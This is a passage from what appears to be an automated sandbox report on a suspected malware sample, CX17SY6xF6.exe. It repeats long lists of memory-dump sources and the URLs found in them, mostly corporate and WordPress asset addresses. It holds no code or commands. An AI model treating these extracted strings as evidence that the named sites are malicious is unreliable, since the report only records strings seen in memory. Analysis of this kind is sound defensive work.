00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/3
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/assets/css/cookieblocker.min.css?ver=6.5.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/cookiebanner/js/complianz.min.js?ver=6.5.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.mi
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.14.
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.10
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.
